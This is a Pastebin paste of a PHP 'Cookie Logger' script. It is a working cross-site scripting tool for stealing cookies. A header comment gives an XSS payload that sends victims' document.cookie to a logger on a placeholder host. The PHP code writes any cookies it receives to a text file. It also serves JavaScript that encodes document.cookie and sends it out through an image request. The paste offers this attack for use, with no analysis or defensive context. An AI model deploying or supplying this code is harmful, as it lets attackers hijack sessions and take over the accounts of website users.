ToKeiChun

Cookie Logger

Feb 9th, 2020
260
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. /*
  3. * Created on 16. april. 2007
  4. * Created by Audun Larsen (audun@munio.no)
  5. *
  6. * Copyright 2006 Munio IT, Audun Larsen
  7. *
  8. * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,
  9. * INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
  10. * FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
  11. * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
  12. * (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
  13. * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
  14. * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
  15. * EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
  16. *
  17. * CookieLogger.php
  18. * CookieLog.txt
  19. *
  20. * PAYLOAD XSS
  21. * <script>document.location="http://www.host.com/mysite/CookieLogger.php?cookie=" + document.cookie;</script>
  22. */
  23.  
  24. if(strlen($_SERVER['QUERY_STRING']) > 0) {
  25.     $fp=fopen('./CookieLog.txt', 'a');
  26.     fwrite($fp, urldecode($_SERVER['QUERY_STRING'])."\n");
  27.     fclose($fp);
  28. } else {
  29. ?>
  30.  
  31. var ownUrl = 'http://<?php echo $_SERVER['HTTP_HOST']; ?><?php echo $_SERVER['PHP_SELF']; ?>';
  32.  
  33. // ==
  34. //  URLEncode and URLDecode functions
  35. //
  36. // Copyright Albion Research Ltd. 2002
  37. // http://www.albionresearch.com/
  38. //
  39. // You may copy these functions providing that
  40. // (a) you leave this copyright notice intact, and
  41. // (b) if you use these functions on a publicly accessible
  42. //  web site you include a credit somewhere on the web site
  43. //  with a link back to http://www.albionresearch.com/
  44. //
  45. // If you find or fix any bugs, please let us know at albionresearch.com
  46. //
  47. // SpecialThanks to Neelesh Thakur for being the first to
  48. // report a bug in URLDecode() - now fixed 2003-02-19.
  49. // And thanks to everyone else who has provided comments and suggestions.
  50. // ==
  51. function URLEncode(str)
  52. {
  53.     // The Javascript escape and unescape functions do not correspond
  54.     // with what browsers actually do...
  55.     var SAFECHARS = "0123456789" +        // Numeric
  56.         "ABCDEFGHIJKLMNOPQRSTUVWXYZ" +    // Alphabetic
  57.         "abcdefghijklmnopqrstuvwxyz" +
  58.         "-_.!~*'()";        // RFC2396 Mark characters
  59.     var HEX = "0123456789ABCDEF";
  60.  
  61.     var plaintext = str;
  62.     var encoded = "";
  63.     for (var i = 0; i < plaintext.length; i++ ) {
  64.         var ch = plaintext.charAt(i);
  65.         if (ch == " ") {
  66.             encoded += "+";                // x-www-urlencoded, rather than %20
  67.         } else if (SAFECHARS.indexOf(ch) != -1) {
  68.             encoded += ch;
  69.         } else {
  70.             var charCode = ch.charCodeAt(0);
  71.             if (charCode > 255) {
  72.                 alert( "Unicode Character '"
  73.     + ch
  74.     + "' cannot be encoded using standard URL encoding.\n" +
  75.                     "(URL encoding only supports 8-bit characters.)\n" +
  76.           "A space (+) will be substituted." );
  77.                 encoded += "+";
  78.             } else {
  79.                 encoded += "%";
  80.                 encoded += HEX.charAt((charCode >> 4) & 0xF);
  81.                 encoded += HEX.charAt(charCode & 0xF);
  82.             }
  83.         }
  84.     } // for
  85.  
  86.     return encoded;
  87. };
  88.  
  89. cookie = URLEncode(document.cookie);
  90. html = '<img src="'+ownUrl+'?'+cookie+'">';
  91. document.write(html);
  92.  
  93. < ?php
  94. }
  95. ?>
Add Comment
Please, Sign In to add comment